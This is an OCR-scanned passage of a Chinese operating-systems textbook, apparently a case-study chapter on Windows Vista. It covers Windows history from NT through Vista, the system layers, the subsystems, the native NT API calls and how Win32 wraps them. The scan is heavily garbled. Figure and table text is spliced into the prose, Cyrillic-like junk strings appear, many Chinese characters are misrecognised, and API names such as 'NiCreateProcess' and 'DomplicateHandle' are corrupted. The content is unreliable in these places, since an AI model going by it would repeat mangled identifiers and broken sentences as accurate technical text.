称 为 Win32。 在 生产 和 销售 NT 的 那 段 时 间 里 ，Windows 3.0 发 布 了 ， 并 且 在 商业 上 取得 了 成 功 。 它 不 仅 
可 以 运行 Win32 程 序 ， 并 且 使 用 Win32 兼 容 库 。 

就 像 基于 MS-DOS 的 Windows 的 最 初版 本 一 样 ， 基 于 NT 的 Windows 的 最 初版 本 也 不 是 完全 成 功 的 。 
NT 需要 更 多 的 内 存 ， 那 时 只 有 很 少 的 32 位 应 用 程序 。 并 且 与 设备 驱动 和 应 用 程序 的 不 兼容 使 得 许多 消 
费 者 重新 回 到 微软 仍 在 改进 的 基于 MS-DOS 的 Windows 一 一 发 布 于 1995 年 的 Windows 95, Windows 95 提 
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供 像 NT 一 样 的 本 地 的 32 位 程序 界面 ， 但 是 与 现存 的 16 位 程序 和 应 用 软件 有 更 好 的 兼容 性 。 并 不 使 人 惊 
奇 的 是 ，NT 的 早期 成 功 是 在 服务 器 市 场 与 YMS 和 NetWare 的 竞争 中 。 

NT 确实 达到 了 可 移植 性 的 目标 ， 在 后 续 的 1994 和 1995 年 发 布 的 版 本 中 增加 了 对 (小 指令 字 节 )MIPS 
和 Power PC 架构 的 支持 。NT 最 初 最 主要 的 升级 是 
在 1996 年 升级 成 为 Windows NT 4.0。 这 个 系统 包 
含 了 性 能 、 安 全 性 和 可 靠 性 ， 也 拥有 跟 Windows 


95 同 样 的 用 户 界面 。 
图 11-3 显 示 了 Win32 API 和 Windows 之 间 的 关 
系 。 具 有 通用 的 API 接 口 的 基于 MS-DOS 的 | Win 32 应 用 程序 界面 
Windows 和 基于 NT 的 Windows 促 成 了 NT 的 成 功 。 
这 种 兼容 性 使 得 用 户 可 以 方便 地 从 Windows 95 移 Wintona Е Зент 
植 到 NT， 操 作 系统 也 在 高 端的 计算 机 市 场 上 比如 说 
服务 器 领域 中 扮演 了 很 重要 的 角色 。 然 而 ， 用 户 并 图 11-3 Win32 API 接 口 允许 程序 在 
不 急切 地 希望 接纳 其 他 处 理 器 架构 ， 在 1996 年 几乎 所 有 版 本 的 Windows 上 运行 


Windows NT 支持 的 四 种 架构 中 (在 这 个 版 本 中 增加 
了 对 DEC Alpha 的 支持 ) ， 只 有 x86 (就 是 奔腾 家 族 ) 在 下 一 个 主要 的 发 布 一 一 Windows 2000 中 被 着 重地 支持 。 

Windows 2000 代 表 了 NT 的 重大 进化 。 增 加 的 关键 技术 包括 即 插 即 用 功能 ( 当 使 用 者 要 安装 新 的 PCI 
卡 时 ， 不 再 需要 更 改 跳 线 )、 网 络 目录 服务 (对 于 企业 用 户 ) 、 改 进 的 电源 管理 (对 于 笔记 本 用 户 ) 和 改 
进 的 GUI (对 于 任何 用 户 )。 

Windows 2000 技 术 上 的 成 功 ， 领 导 着 微软 继续 朝 着 通过 提高 应 用 程序 和 设备 的 兼容 性 来 引导 下 一 
个 系统 Windows XP， 而 Windows 98 则 逐步 淡出 市 场 。Windows XP 包含 了 一 个 更 加 友好 的 外 观 及 感觉 的 
图 形 界面 ， 更 加 增强 了 微软 关于 关联 消费 者 以 及 增加 了 消费 者 推动 他 们 的 雇主 来 接纳 他 们 已 经 熟悉 的 环 
境 的 销售 策略 。 这 一 策略 获得 了 压倒 性 的 成 功 ， 在 最 初 的 几 年 里 ，Windows XP 被 安装 在 成 千 上 万 台 计 
算 机 上 ， 这 使 得 微软 成 功 实现 了 有 效 地 结束 基于 MS-DOS 的 Windows 系 统 这 个 目标 。 

Windows XP 代 表 着 微软 的 一 种 新 的 发 展 路 径 ， 为 桌面 用 户 和 企业 用 户 发 布 了 不 同 的 版 本 。Windows 
XP 系 统 太 复杂 以 至 于 不 能 同时 提供 高 质量 的 客户 端 以 及 服务 器 发 布 。Windows 2003 服 务 器 版 本 是 
Windows XP 客户 端 操作 系统 的 补充 ， 它 提供 了 对 Intel 64 位 安 腾 处 理 器 的 支持 ， 并 且 在 它 的 第 一 个 补丁 包 
中 ， 对 AMD x64 架 构 的 服务 器 和 客户 机 都 提供 了 支持 。 微 软 利用 用 户 版 本 和 企业 版 本 不 同 的 发 布 时 间 来 
增加 服务 器 特性 ， 引 导 在 商业 主要 应 用 的 测试 。 图 11-4 显 示 了 Windows 用 户 版 本 和 服务 器 版 本 的 关系 。 


кал 用 户 版 本 年 份 服务 器 版 本 

1996 Windows NT 1996 Windows NT Ѕегуег 
1999 Windows 2000 1999 Windows 2000 Server 
2001 Windows XP 2003 Windows Server 2003 
2006 Windows Vista 2007 Windows Server 2008 


11-4 Windows 用 户 版 本 和 服务 器 版 本 在 不 同时 间 发 布 


微软 紧 跟着 Windows XP 后 面 的 是 一 个 维 心 勃 勃 的 发 布 ， 令 PC 消费 者 兴奋 的 全 新 体验 。 最 终 的 结果 ， 
Windows Visia， 在 2006 年 下 半年 完成 ， 距 离 Windows XP 发 布 大 约 五 年 。Windows Vista 声 称 有 全 新 开发 的 图 形 
用 户 界面 ， 新 的 安全 特性 。 大 多 数 改 变 是 在 使 用 者 的 可 视 化 经 验 和 兼容 性 方面 。 系 统 内 部 的 技术 大 幅度 地 提 
高 了 ， 进 行 了 很 多 内 部 编码 优化 和 许多 在 界面 上 的 改善 、 可 测量 性 和 可 信赖 性 。Vista 的 服务 器 版 本 【Windows 
Server 2008) 在 用 户 版 本 的 一 年 之 后 发 布 ， 它 分 享 了 同样 的 系统 内 核 ， 例 如 核心 、 驱 动 、 底 县 库 和 程序 。 

关于 早期 开发 NT 的 人 物 历史 在 一 本 书 《Show stopper) © (Zachary 1994) 里 有 相关 的 介绍 。 书 中 
讲述 到 很 多 关键 的 人 物 ， 以 及 在 如 此 庞大 的 软件 开发 工程 中 所 经 历 的 困难 。 


Ө 本 书 中 文 版 已 由 机 械 工业 出 版 社 引进 出 版 ， 书 名 为 《 观 止 一 一 微软 创建 NT 和 未 来 的 夺 命 狂奔)， 书 号 为 
ISBN 978-7-111-26530-6。 一 一 编辑 注 
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11.1.4 Windows Vista 

Windows Vista 达到 了 微软 目前 为 止 最 为 全 面 的 操作 系统 的 奖 峰 。 最 初 的 计划 太 过 于 激进 以 至 于 头 
几 年 的 Vista 开 发 必须 以 更 小 的 范畴 重新 开始 。 计 划 严 重 依赖 于 包括 微软 的 类 型 安全 、 垃 圾 回收 、.NET 
语言 C# 等 在 内 的 技术 ， 以 及 一 些 有 意义 的 特性 ， 例 如 统一 存储 系统 用 来 从 多 种 不 同 的 来 源 中 搜索 和 组 织 
数据 的 WinFS。 整 个 操作 系统 的 规模 是 相当 惊人 的 。 最 早 NT 系 统 发 行 时 只 有 300 万 条 C/C++ 语 句 ， 到 
NT4 时 增长 到 1600 万 ，2000 是 3000 万 ，XP 是 5000 万 ， 而 到 了 Vista 已 经 超过 了 7000 万 。 

规模 增 大 的 大 部 分 原因 是 每 次 微软 公司 在 发 行 新 版 本 时 都 增加 一 些 新 功能 。 在 system32 的 主 目录 中 ， 
含有 1600 个 动态 链接 库 (DLL) 和 400 个 可 执行 文件 (EXE) ， 而 这 还 不 包含 让 用 户 网 上 冲浪 、 播 放 音乐 
和 视频 、 发 电子 邮件 、 浏 览 文件 、 整 理 照 片 甚至 制作 电影 各 种 各 样 应 用 程序 的 目录 。 但 是 微软 想 让 客户 
使 用 新 版 本 ， 所 以 它 兼容 了 老 版 本 的 所 有 特征 ， 应 用 程序 界面 API、 程 序 (小 的 应 用 软件 ) 等 。 几 乎 很 少 
有 功能 被 删 掉 。 结 果 随 着 版 本 的 升级 Windows 系 统 越 来 越 大 。 随 着 科技 发 展 ，Windows 发 布 的 载体 也 从 软 


驱 ，CD 发 展 到 现在 的 Windows Vista 上 的 DVD。 ЕТЕ ii Vista 
随 着 Windows 上 层 功能 和 程序 的 膨胀 使 得 和 CPU 调度 器 50 000 75 000 

其 他 操作 系统 在 有 效 大 小 上 的 比较 成 问题 ， 因 为 。。 | ро 基础 设施 “| 45 000 60000 

很 难 定义 某 一 部 分 是 否 属于 操作 系统 。 在 操作 系 虚拟 内 存 25 000 175 000 


统 的 下 层 ， 因 为 执行 相关 联 的 功能 ， 所 以 通信 比 
较 频 繁 。 即 使 如 此 我 们 也 能 看 到 在 不 同 的 
Windows 之 间 也 有 很 大 的 不 同 。 图 11-5 比 较 了 
Windows 和 Linux 的 核心 在 CPU 调度 、IO 设 备 和 
虚报 内 存 三 个 主要 功能 方面 的 区 别 。Windows 中 前 两 部 分 是 Linux 的 一 半 大 小 ， 但 是 虚拟 内 存 部 分 要 大 一 
个 数量 级 一 一 因为 有 大 量 的 功能 ， 虚 拟 内 存 模型 实现 技术 需要 大 量 代码 实现 高 速 运行 。 
11.2 Windows Vista 编 程 

现在 开始 Windows Vista 的 技术 研究 。 但 是 ， 在 研究 详细 的 内 部 结构 之 前 ， 我 们 首先 看 看 系统 调用 
的 本 地 NT API 和 Win32 编 程 子 系统 。 尽 管 有 可 移植 操作 系统 接口 (POSIX) ， 但 实际 上 为 Windows 编 写 
的 代码 不 是 Win32 就 是 NET， 其 中 .NET 本 身 也 是 运行 在 Win32 之 上 的 。 

图 11-6 介 绍 的 是 Windows 操 作 系统 的 各 个 层次 。 在 Windows 应 用 程序 和 图 形 层 下 面 是 构造 应 用 程序 
的 程序 接口 。 和 大 多 数 操作 系统 一 样 ， 这 些 接口 主要 包括 了 代码 库 (DLL)， 这 些 代码 库 可 以 被 应 用 程 
序 动态 链接 以 访问 操作 系统 功能 。Windows 也 包含 一 些 被 实现 为 单独 运行 进程 的 服务 的 应 用 程序 接口 。 
应 用 软件 通过 远程 过 程 调 用 (RPC) 与 用 户 态 服务 进行 通信 。 


图 11-5 对 Windows 和 Linux 中 选 定 内 核 模块 的 代码 行 
数 (LOC) 比 较 (来 自 Microsoft Windows 
Internals 的 作者 Mark Russinovich) 


Applets (小 型 Win32 可 执行 程序 ) 
NT 服务 ， GUI(shell32.dll, user32.dll, 88132.41) 
smss,lsass,services, 动态 库 (ole32.dll,rpc.dll) P 
міповоп,..  |КЕжАРЦкетпе132.4П, айуарзота | | 于 系统 进程 (csrss) 
用 户 态 本 地 NT API，C/C++ 运 行 时 (ntdllLdl) 
WEE NTOS 内 核 层 
驱动 : 设备， 文件 = сл) 
系统 ， 网 络 NTOS 执 行 体 (ntoskrnl.exe) (кзн 
硬件 抽象 层 HAL (һаа) 


图 11-6 Windows 的 编程 层 


NT 操作 系统 的 核心 是 NTOS 内 核 态 程序 (ntoskrnlexe)， 它 提供 了 操作 系统 的 其 他 部 分 的 实现 所 依 
赖 的 传统 的 系统 调用 接口 。 在 Windows 中 ， 只 有 微软 的 程序 员 编写 系统 调用 层 。 已 经 公开 的 用 户 态 接口 


笑 例 研究 2: Windows Vista 463 


属于 操作 系统 本 身 ， 它 通过 运行 在 NTOS 层 顶层 的 子 系统 (subsystem) 来 实现 的 。 

最 早 的 NT 支持 三 个 个 性 化 子 系统 : OS/2、POSIX、Win32。OS/2 在 Windows XP 中 已 经 不 使 用 了 。 
POSIX 也 同样 不 使 用 了 ， 但 是 客户 可 以 得 到 一 个 叫做 Interix 的 改进 版 POSIX 的 子 系统 ， 它 是 微软 面向 
UNIX 的 服务 (SFU) 的 一 部 分 ， 因 此 所 有 设备 都 支持 系统 中 原 有 的 POSIX。 尽 管 微软 支持 其 他 的 API， 但 
大 多 数 Windows 的 应 用 软件 都 是 用 Win32 写 的 。 

不 同 于 Win32，.NET 并 不 是 原来 NT 的 内 核 接口 上 的 正式 的 子 系统 。 相 反 ，.NET 是 建立 在 Win32 编 
程 模型 之 上 的 。 这 样 就 可 以 使 .NET 与 现 有 的 Win32 程 序 很 好 地 互通 ， 而 不 必 关 心 POSIX 和 OS/2 子 系统 。 
WinFX API 包 含 了 很 多 Win32 的 功能 ， 而 实际 上 WinFX 基 本 类 库 (Base Class Library) 中 大 多 数 的 功能 
都 是 Win32 API 的 简单 包装 器 。WinFX 的 优点 是 有 丰富 的 对 象 类 型 支持 、 简 单一 致 的 界面 、 使 用 NET 公 
共 语 言 运行 库 (Сї) 和 垃圾 收集 器 。 

如 图 11-7 所 示 ，NT 子 系统 建立 了 四 个 部 分 : 子 系统 进程 、 程 序 库 、 创 建 进程 (CreateProcess) 钩子 、 
内 核 支持 。 一 个 子 系统 进程 只 是 一 个 服务 。 它 唯一 特殊 的 性 质 就 是 通过 smss .exe 程序 (一 个 由 NT 启动 的 
初始 用 户 态 程序 ) 开始 ， 以 响应 来 自 Win32 的 CreateProcess 或 不 同 的 子 系统 中 相应 的 API 的 请 求 。 


程序 进程 


子 系统 库 


子 系统 运行 时 库 
(CreateProcess 钩子 ) 子 系统 进程 


本 地 NT АРІ, С/С++ 运行 时 


子 系统 内 核 支持 


本 地 程序 调用 (1РС) 
本 地 NT 系统 服务 


NTOS 执 行 体 


图 11-7 用 于 构建 NT 子 系统 的 模块 


程序 库 同时 实现 了 高 层 的 操作 系统 功能 和 特定 的 子 系统 进程 。 这 些 高 层 的 操作 系统 功能 是 特定 于 子 
系统 以 及 子 系统 所 包含 的 村 程序 (stub routine) 的 。 桩 程序 是 进行 不 同 的 使 用 子 系统 的 进程 间 通 信 的 。 
对 子 系统 进程 的 调用 通常 是 利用 内 核 态 的 本 地 过 程 调用 LPC (Local Procedure Call) 所 提供 的 功能 。 
LPC 实 现 了 跨 进程 的 进程 调用 。 

在 Win32 CreateProcess 中 的 钩子 函数 (hook) 通过 查看 二 进 制图 像 来 检测 子 系统 中 每 个 程序 请 求 。 
(如 果 它 没有 运行 ) 通过 smss.exe 启 动 子 系统 进程 csrss.exe。 然 后 子 系统 进程 开始 加 载 程序 。 在 其 他 子 系 
统 中 也 有 类 似 的 钩子 函数 (例如 POSIX 中 的 exec 系 统 调用 ) 。 

NT 内 核 有 很 多 一 般 用 途 的 设备 ， 可 以 用 来 编写 操作 系统 特定 的 子 系统 。 但 是 为 了 准确 地 执行 每 一 个 
子 系统 还 需要 加 入 一 些 特殊 的 代码 。 例 如 ， 本 地 NtCreateProcess 系 统 调用 通过 重复 使 用 进程 实现 POSIXF 
fork 函 数 调用 ， 内 核 提供 一 个 Win32 特 殊 类 型 串 表 (natoms)， 通 过 进程 有 效 实现 只 读 字符 串 的 共享 。 

子 系统 进程 是 本 地 端 NT 程序 ， 其 使 用 NT 内 核 和 核心 服务 提供 的 使 用 本 地 系统 调用 ， 例 如 smss exe 
和 lsass.exe (本 地 安全 管理 ) 。 本 地 系统 调用 包括 管理 虚拟 地 址 的 跨 进程 功能 (facility), RE, AA 
为 了 运行 用 来 使 用 特定 子 系统 的 程序 而 创建 的 进程 中 的 异常 。 


11.2.1 内 部 NT 应 用 编程 接口 
像 所 有 的 其 他 操作 系统 一 样 ，Windows Vista 也 拥有 一 套 系 统 调用 。 它 们 在 Windows Vista 的 NTOS 
层 实施 ， 在 内 核 态 运行 。 微 软 没有 公布 内 部 系统 调用 的 细节 。 它们 被 操作 系统 内 部 一 些 底层 程序 使 用 ， 
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这 些 底层 程序 通常 是 以 操作 系统 的 一 部 分 (主要 是 服务 和 子 系统 )， 或 者 是 内 核 态 的 设备 驱动 程序 的 形 
式 交 付 的 。 本 地 的 NT 系统 调用 在 版 本 的 升级 中 


并 没有 太 大 的 改变 ， 但 是 微软 并 没有 选择 公开 ，。 ААИ аа еа 
而 Windows 的 应 用 程序 都 是 基于 Win32 的 ， 因 此 UO 完 成 队列 

Win32 API 在 不 同 Windows 操 作 系 统 中 是 通用 [б ХИ. йй. Ж), а 

的 ， 从 而 能 够 让 这 些 应 用 程序 在 基于 MS-DOS 和 程序 任务 、 进 程 、 线 程 、 节 、 标 签 
NT Windows 的 系统 中 正确 运行 。 Win32 GUI 桌面 、 应 用 程序 回调 


大 多 数 内 部 的 NT 系统 调用 部 是 对 内 核 态 对 І 
象 进行 操作 的 ， 包 括 文件 、 线 程 、 管 道 、 信 号 量 иша Ншёна зилинин 
等 。 图 11-8 中 给 由 了 一 些 Windows Vista 中 NT 所 支持 的 常见 内 核 态 对 象 。 以 后 ， 我 们 讨论 内 核对 象 管理 
器 时 ， 会 讨论 具体 对 象 类 型 细节 的 。 

有 时 使 用 术语 “对 象 ”来 指 代 操作 系统 所 控制 的 数据 结构 这 样 就 会 造成 困惑 ， 因 为 错误 理解 成 
“面向 对 象 ”了 。 操 作 系 统 的 对 象 提供 了 数据 隐 蕊 和 抽象 ， 但 是 缺少 了 一 些 面向 对 象 体系 基本 的 性 质 
如 继承 和 多 态 性 。 

在 本 地 NT AP 调用 中 存在 创建 新 的 内 核 太 对 象 或 操作 已 经 存在 的 对 象 的 调用 。 每 次 创建 和 打开 对 象 
的 调用 都 返回 一 个 结果 叫 身 杨 handle) 给 调用 者 (caller)。 句 栖 可 在 接 下 来 用 于 执行 对 象 的 操作 。 句 朵 
是 特定 于 创建 它们 的 具体 的 进程 的 。 通 常 句柄 不 可 以 直接 交 给 其 他 进程 ， 也 不 能 用 于 同一 个 对 象 ， 然 而 
在 甘 些 情况 下 通过 一 个 受 保护 的 方法 有 可 能 把 一 个 句柄 复制 到 其 他 进程 的 句柄 表 中 进行 处 理 ， 驳 许 进程 
共享 访问 对 象 一 即使 对 象 在 名 字 空 间 无 法 访问 。 复 制 句 柄 的 进程 必须 有 来 源 和 目标 进程 的 名。 

每 一 个 对 象 都 有 一 个 和 它 相关 的 安全 描述 信息 ， 详 细 指出 对 于 特定 的 访问 请 求 ， 什 么 对 象 能 够 或 者 
不 能 够 针对 一 个 特定 的 目标 进行 何 种 操作 。 当 句柄 在 进程 之 间 复 制 的 时 候 ， 可 添加 具体 的 被 复制 句柄 相 
关 的 访问 限制 。 从 而 一 个 进程 能 够 复制 一 个 可 读 写 的 句柄 ， 并 在 目标 进程 中 把 它 改 变 为 只 谈 的 版 本 。 

并 不 是 所 有 系统 创建 的 数据 结构 都 是 对 象 ， 并 不 是 所 有 的 对 象 都 大 内 核对 象 。 那 些 真 正 的 内 核 术 对 
象 是 那些 需要 命名 、 保 护 或 以 某 种 方式 共享 的 对 象 。 通 常 ， 这 些 内 核 太 对 象 表 示 了 在 内 核 中 的 革 种 编程 
抽象 。 每 一 个 内 核 态 的 对 象 有 一 个 系统 定义 类 型 ， 有 明确 界定 的 操作 ， 并 占用 内 核 内 存 。 虽 然 用 户 态 的 
程序 可 以 执行 操作 (通过 系统 调用 ) ， 但 是 不 能 直接 得 到 数据 。 

图 11-9 为 一 些 本 地 API 的 示例 ， 通 过 特定 的 句 梢 操作 内 核对 象 ， 如 进程 、 线 程 、IPC 端 口 和 房 玉 (用 
来 描述 可 以 映射 到 地 址 空间 的 内 存 对 象 )。NtCreateProcess 返 回 一 个 创建 新 进程 对 象 的 句柄 
SectionHandle 代 表 一 个 执行 实例 程序 。 当 通 到 异 党 时 控制 进程 (例如 异常 、 越 田 )，DebugPor 
Handle 用 来 在 出 现 异 常 (例如 ， 除 零 或 者 内 存 访问 越界 ) 之 后 把 进程 控制 权 交 给 调试 器 的 过 程 中 与 调试 
器 通信 。 


МСтеаіеРгосеѕз(аРтосНапаїе, Access, SectionHandle DebugPortHandle, ExceptPonHandie, ) 
NiCreateThread(&ThreadHandle, ProcHandle Access, ThreadContext, CreateSuspended, .. 
NtAllocateVirtuaiMemory(ProcHandie, Addr, Size, Type, Protection, ...) 

| NtMapViewOfSection(SectHandle, ProcHandle, Addr, Size, Protection, ..) 
NtReadVirtualMemory(ProcHandie, Addr, Size, ..) 

NtWriteVirtuaiMemory(ProcHandie, Addr, Size, ...) 

| NtCreateFile(&FileHandie, FileNameDescriptor, Access, ...) 
NtDuplicateObject(srcProcHandle, srcObiHandie, dstProcHandie, dstObjHandle, ) | 


图 11-9 在 进程 之 间 使 用 句柄 来 管理 对 象 的 本 地 NT API 调 用 示例 


NtCreate 线 程 需要 ProcHandle， 因 为 ProcHandle 可 以 在 任意 一 个 含有 人 多 柄 的 进程 中 (有 足够 的 访 
间 权 限 ) 创建 线程 。 同 样 ，NtAllocateVirtualMemory、 NtMapViewOfSection, NtReadVirtualMemory 
和 NtWriteVirtualMemory 可 使 进程 不 仅 在 自己 的 地 址 空间 操作 ， 也 可 以 在 分 配 虚拟 地 址 和 映射 段 ， 还 可 
以 读 写 其 他 进程 的 虚拟 内 存 。NtCreateFile 是 一 个 内 部 API 调 用 ， 用 来 创建 或 打开 文件 。NtDuplicate- 
Object， 可 以 在 不 同 的 进程 之 间 复制 句柄 的 API 调 用 。 
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当然 不 是 只 有 Windows 有 内 核 态 对 象 。UNIX 系 统 也 同样 支持 内 核 态 对 象 ， 例 如 文件 、 网 络 数据 包 、 
管道 、 设 备 、 进 程 、 共 享 内 存 的 IPC 设 备 、 消 息 端 口 、 信 号 和 IO 设备 。 在 UNIX 中 有 各 种 各 样 的 方式 命 
名 和 访问 对 象 ， 例 如 文件 描述 符 、 进 程 ID、System V IPC 对 象 的 整形 ID 和 设备 节点 。 每 一 类 的 UNIX 对 
象 的 实现 是 特定 于 其 类 别 的 。 文 件 和 socket 使 用 不 同 的 设施 facility ， 并 且 是 System У IPC 机 制 、 程 序 、 
装置 之 外 的 。 

Windows 中 的 内 核对 象 使 用 一 个 的 基于 NT 名 字 空 间 中 关于 对 象 的 句柄 和 命名 统一 设备 指 代 内 核对 
象 ， 而 且 使 用 一 个 统一 的 集中 式 对 象 管理 器 。 句 柄 是 进程 特定 的 ， 但 正如 上 文 所 述 ， 可 以 在 被 另 一 个 进 
程 使 用 。 对 象 管理 器 在 创建 对 象 时 可 以 给 对 象 命 名 ， 可 以 通过 名 字 打开 对 象 的 句柄 。 

对 象 管理 器 在 NT 名 字 空 间 中 使 用 统一 的 字符 编码 标准 ( 宽 位 字符 ) 命名 。 不 同 于 UNIX，NT 一 般 
不 区 分 大 小 写 ( 它 保 留 大 小 写 但 不 区 分 )。NT 名 字 空 间 是 一 个 分 层 树 形 结构 的 目录 ， 象 征 联系 和 对 象 。 

对 象 管理 器 提供 统一 的 管理 同步 、 安 全 和 对 象 生 命 期 的 设备 。 对 于 对 象 管理 器 提供 给 用 户 的 一 般 设 
备 是 否 能 为 任何 特定 对 象 的 用 户 所 获得 ， 这 是 由 执行 体 部 件 来 决定 的 ， 它 们 都 提供 了 操纵 每 一 个 对 象 类 
型 的 内 部 API。 

这 不 仅 是 应 用 程序 使 用 对 象 管理 器 中 的 对 象 。 操 作 系统 本 身 也 创建 和 使 用 对 象 一 一 而 且 非 常 多。 大 
多 数 这 些 对 象 的 创建 是 为 了 让 系统 的 某 个 部 分 存储 相当 一 段 长 时 间 的 信息 或 者 将 一 些 数据 结构 传递 给 其 
他 的 部 件 ， 但 这 都 受益 于 对 象 管理 器 对 命名 和 生存 周期 的 支持 。 例 如 ， 当 一 个 设备 被 发 现 ， 一 个 或 多 个 
设备 创建 代表 该 设备 对 象 ， 并 在 理论 上 说 明 该 设备 如 何 连 接 到 系统 的 其 他 部 分 。 为 了 控制 设备 而 加 载 设 
备 的 驱动 程序 ， 创 建 坚 动 程序 对 象 用 来 保存 属性 和 提供 驱动 程序 所 实现 的 函数 的 指针 ， 这 些 函 数 是 实现 
对 1/O 请 求 的 处 理 。 操 作 系 统 中 在 以 后 使 用 其 对 象 时 会 涉及 这 个 驱动 。 驱 动 也 可 以 直接 通过 名 字 来 访问 ， 
而 不 是 间接 的 通过 它 所 控制 的 设备 来 访问 的 (例如 ， 从 用 户 态 来 设置 控制 它 的 操作 的 参数 )。 

不 像 UNIX 把 名 字 空 间 的 根 放 在 了 文件 系统 中 ，NT 的 名 字 空 间 则 是 保留 在 了 内 核 的 虚拟 内 存 中 。 这 
意味 着 NT 在 每 次 系统 启动 时 ， 都 得 重新 创建 最 上 层 的 名 字 空 间 。 内 核 虚拟 内 存 的 使 用 ， 使 得 NT 可 以 把 
信息 存储 在 名 字 空 间 里 ， 而 不 用 首先 启动 文件 系统 。 这 也 使 得 NT 更 加 容易 地 为 系统 添加 新 类 型 的 内 核 
态 的 对 象 ， 原 因 是 文件 系统 自身 的 格式 不 需要 为 每 种 新 类 型 的 目标 文件 进行 改变 。 

一 个 命名 的 目标 文件 可 以 标记 为 永久 性 的 ， 这 意味 着 这 个 文件 会 一 直 存 在 ， 即 使 在 没有 进程 的 句柄 
指向 该 对 象 条 件 下 ， 除 非 它 被 副 除 或 者 系统 重新 启动 。 这 些 对 象 甚至 可 以 通过 提供 parse 例 程 来 扩展 NT 
的 名 字 空间 ， 这 种 例 程 方式 类 似 于 人 允许 对 象 具有 UNIX 中 挂 载 点 的 功能 。 文 件 系统 和 注册 表 使 用 这 个 工 
具 在 NT 的 名 字 空 间 上 挂 载 卷 和 储 梨 。 访 问 到 一 个 卷 的 设备 对 象 即 访 问 了 原始 卷 (raw volume) ， 但 是 设 
备 对 象 也 可 以 表明 一 个 卷 可 以 加 载 到 NT 名 字 空 间 中 去 。 卷 上 的 文件 可 以 通过 把 卷 相关 文件 名 加 在 卷 所 
对 应 的 设备 对 象 的 名 称 后 面 来 访问 。 

永久 性 名 字 也 用 来 描述 同步 的 对 象 或 者 共享 内 存 ， 因 此 它们 可 以 被 进程 共享 ， 避 免 了 当 进 程 频繁 启 
动 和 停止 时 来 不 断 重建 。 设 备 文件 和 经 常 使 用 的 驱动 程序 会 被 给 予 永久 性 名 字 ， 并 且 给 予 特殊 索引 节点 
持久 属性 ， 这 些 索引 节点 保存 在 UNIX 的 /dev 目 录 下 。 

我 们 将 在 下 一 节 中 描 叙 纯 NT API 的 更 多 特征 ， 讨 论 Win32 API 在 NT 系统 调用 的 封装 性 。 


11.2.2 Win32 应 用 编程 接口 

Win32 函 数 调用 统称 为 Win32 API 接 口 。 这 些 接口 已 经 被 公布 并 且 详细 地 写 在 了 文档 上 。 这 些 接口 在 
调用 的 时 候 采 用 库 文件 链接 流程 :通过 封装 来 完成 原始 NT 系统 调用 ， 有 些 时 候 也 会 在 用 户 态 下 工作 。 虽 
然 原始 API 没 有 公布 ， 但 是 这 些 API 的 功能 可 以 通过 公布 的 Win32 API 来 调用 实现 。 随 着 新 的 Windows 版 本 
的 更 新 ， 更 多 的 API 函 数 相应 增加 ， 但 是 原先 存在 的 API 调 用 确 很 少 改变 ， 即 使 Windows 进 行 了 升级 。 

图 11-10 表 示 出 各 种 级 别 的 Win32 API 调 用 以 及 它们 封装 的 原始 API 调 用 。 最 有 趣 的 部 分 是 关于 图 上 
令 人 乏味 的 映射 。 许 多 低级 别 的 Win32 函 数 有 相对 应 的 原始 NT 函数 ， 这 一 点 都 不 奇怪 ， 因 为 Win32 就 是 
为 原始 NT API 设 计 的 。 在 许多 例子 中 ，Win32 函 数 层 必须 利用 Win32 的 参数 传递 给 NT 内 核 函 数 。 例 如 ， 
规范 路 径 名 并 且 映 射 到 NT 内 核 路 径 ， 包 括 特殊 的 MS-DOS 设 备 (如 LPT:)。 当 创建 进程 和 线程 时 ， 使 用 
的 Win32 API 函 数 必须 通知 Win32 子 系统 进程 csrss.exe， 告 知 它 有 新 的 进程 和 线程 需要 它 来 监督 ， 就 像 我 
们 在 11.4 节 里 描述 的 那样 。 
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一 些 Win32 调 用 使 用 路 径 名 ， 然 而 相关 的 NT 内 核 调 用 使 用 句柄 。 所 以 这 些 封 装 流程 包括 打开 文件 ， 


调用 NT 内 核 ， 最 后 关闭 句柄 。 封 装 流程 同时 包括 把 


Win32 调用 本 地 NT API 调 用 
Win32 API 从 ANSI 编 码 变 成 Unicode 编 码 。 在 图 11-10 [есер | NiCreateProcess 
HIWin3 2k СР ЕНЕР ЕЧ К EERE 。 [CreateThread NtCreateThread 
API， 例 如 参数 CreateProcessW 和 CreateProcessA。 当 SuspendThread NtSuspendThread 


这 些 参数 要 传递 到 下 一 个 API 时 ， 这 些 字符 串 必须 翻 
译 成 Unicode 编 码 ， 因 为 NT 内 核 调用 只 认识 Unicode。 


CreateSemaphore 


NICreateSemaphore 


ReadFile 


NtReadFile 


因为 已 经 存在 的 Win32 接 口 很 少 随 着 操作 系统 ат -= 上 Nol 
i ж reateFileMapping reatcSection 
的 改变 而 改变 ， 所 以 从 理论 上 说 能 在 前 个 版 本 系 VirtualAlioc NtAllocateVirtualMemory 
统 上 运行 的 程序 也 能 正常 地 在 新 版 本 的 系统 上 运 MapViewOfFile NtMapViewOfSection 
行 。 可 在 实际 情况 中 ， 依 然 经 常 存在 新 系统 的 兼容 | DomplicateHandle NiDuplicateObject 
性 问题 。Windows 太 复杂 了 以 至 于 有 些 表面 上 不 合 CloseHandie NtClose 


逻辑 的 改动 会 导致 应 用 程序 运行 失败 。 应 用 程序 本 FE аср 
身 也 有 问题 ， 例 如 ， 它 们 也 经 常 做 细致 的 操作 系统 图 1-10 Win32 API 调 用 以 及 它们 

版 本 检查 或 者 本 身 就 有 潜在 的 问题 只 不 过 是 在 新 系 所 包含 的 本 地 NT API 调 用 示例 

统 上 暴露 出 来 了 。 然 而 ， 微 软 依旧 尽力 在 每 个 版 本 上 测试 不 同 的 兼容 性 问题 ， 并 且 力 图 提供 特定 的 解决 
办 法 。 

Windows 支 持 两 种 特殊 环境 ， 一 种 叫 WOW。WOW32 通 过 映射 16 位 字符 囊 到 32 位 ， 来 在 32 位 x86 系 
统 用 16 位 Windows 3.x 应 用 程序 。 同 样 ，WOW64 允 许 32 位 的 程序 在 x64 架 构 的 系统 上 运行 。 

Windows API 体 系 不 同 于 UNIX 体 系 。 对 于 后 者 来 说 ， 操 作 系 统 函数 很 简单 ， 只 有 很 少 的 参数 以 及 
很 少 的 方法 来 执行 同样 的 操作 ， 从 而 可 以 有 很 多 途径 来 完成 同样 的 操作 。Win32 提 供 了 非常 广泛 的 接口 
和 参数 ， 常 常 能 通过 三 四 种 方法 来 做 同样 的 事情 ， 同 时 把 低级 别 和 高 级 别 的 函数 混和 到 一 起 ， 例 如 
CreateFile 和 CopyFile。 

